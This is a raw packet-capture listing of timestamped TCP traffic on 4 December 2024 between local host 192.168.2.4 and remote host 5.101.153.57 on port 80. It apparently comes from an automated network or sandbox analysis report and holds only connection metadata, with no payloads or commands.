Dec 4, 2024 12:16:05.940746069 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.942574024 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.942802906 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.942853928 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.943445921 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.943675041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.943737030 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.944858074 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.945070982 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.945136070 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.946265936 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.997015953 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.064420938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.064588070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.064650059 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.064898968 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.065315962 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.065357924 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.066020966 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.066183090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.066248894 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.067101002 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.067277908 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.067332983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.068056107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.068250895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.068295956 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.069077969 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.069288969 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.069340944 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.070255995 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.070502043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.070554972 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.071238041 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.071414948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.071463108 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.072249889 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.072457075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.072504044 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.073301077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.073498011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.073544979 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.074337006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.074570894 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.074618101 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.075395107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.075609922 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.075650930 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.076432943 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.076653004 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.076695919 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.077511072 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.077693939 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.077743053 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.078557968 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.078783035 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.078830004 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.079778910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.080226898 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.080272913 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.081042051 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.081183910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.081233978 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.081684113 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.081895113 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.081957102 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.082750082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.082956076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.083007097 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.083784103 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.084031105 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.084079027 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.084851027 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.085059881 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.085108995 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.085887909 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.086093903 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.086157084 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.087028980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.087246895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.087294102 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.088006020 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.088227034 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.088283062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.089113951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.089334965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.089381933 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.090095043 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.090308905 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.090353012 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.091197014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.091408014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.091449022 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.092225075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.092438936 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.092485905 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.093307972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.093545914 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.093602896 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.094337940 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.094546080 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.094595909 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.095391035 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.095601082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.095668077 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.096442938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.096641064 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.096690893 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.097472906 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.097678900 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.097721100 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.098562956 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.098778009 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.098824978 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.099597931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.099811077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.099877119 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.100644112 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.100873947 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.100914955 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.101665974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.101901054 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.101948023 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.102708101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.102950096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.102999926 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.103811979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.104005098 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.104054928 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.104839087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.105066061 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.105115891 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.106156111 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.106358051 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.106400967 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.106971979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.107182980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.107232094 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.107971907 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.108196974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.108266115 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.109047890 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.109278917 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.109329939 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.110076904 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.110292912 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.110340118 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.111236095 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.111437082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.111495018 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.112251997 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.112436056 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.112485886 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.113230944 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.113444090 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.113492966 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.114284992 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.114512920 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.114564896 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.115353107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.115616083 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.115668058 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.116404057 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.116636038 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.116678953 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.117429018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.117651939 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.117702961 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.118516922 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.118735075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.118782043 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.119517088 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.168900967 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.265667915 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.265840054 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.265902996 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.266236067 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.266592979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.266663074 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.267208099 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.267415047 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.267467022 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.268269062 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.268508911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.268565893 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.269279003 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.269499063 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.269542933 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.270339966 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.270543098 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.270591021 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.271415949 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.271604061 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.271651983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.272547960 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.272744894 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.272793055 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.273489952 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.273730993 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.273783922 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.274588108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.274782896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.274830103 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.275589943 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.275806904 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.275854111 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.276652098 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.276853085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.276901007 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.277674913 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.277884960 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.277934074 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.278740883 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.278959990 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.279011011 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.279792070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.280009985 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.280060053 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.280842066 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.281053066 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.281100035 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.281913996 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.282102108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.282151937 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.282957077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.283195972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.283253908 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.284003973 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.284204960 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.284259081 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.285049915 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.285254955 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.285305977 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.286236048 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.286493063 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.286554098 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.287185907 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.287379026 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.287441015 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.288211107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.289773941 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.289828062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.292896032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.292911053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.292922974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.292944908 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.292958021 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.292999983 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.293025017 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.293504000 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.293549061 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.294440985 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.294606924 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.294655085 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.295444965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.295599937 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.295646906 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.296561003 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.296729088 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.296772957 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.297588110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.297735929 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.297795057 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.298561096 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.298866034 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.298916101 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.299674034 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.299809933 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.299853086 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.300744057 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.300904036 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.300952911 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.301742077 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.301920891 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.301980019 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.302967072 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.303177118 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.303220034 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.304030895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.304363966 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.304413080 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.305495977 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.305644035 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.305689096 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.306363106 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306488037 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306500912 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306515932 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306528091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306536913 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.306562901 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.306715965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.306766987 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.307342052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.307461977 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.307511091 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.308182955 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.308460951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.308527946 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.309274912 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.309453964 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.309504986 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.310280085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.310472965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.310522079 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.311357021 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.311572075 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.311615944 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.312388897 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.312635899 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.312690020 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.313546896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.313807011 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.313853025 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.314747095 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.314996004 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.315079927 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.315814018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.315942049 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.315987110 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.316766024 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.317022085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.317110062 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.317796946 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.318007946 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.318065882 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.318702936 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.318905115 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.318984985 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.319762945 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.319952965 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.320000887 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.320746899 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.372015953 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.467933893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.468055010 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.468133926 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:06.468339920 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.468732119 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:06.468791008 CET	49730	80	192.168.2.4	5.101.153.57
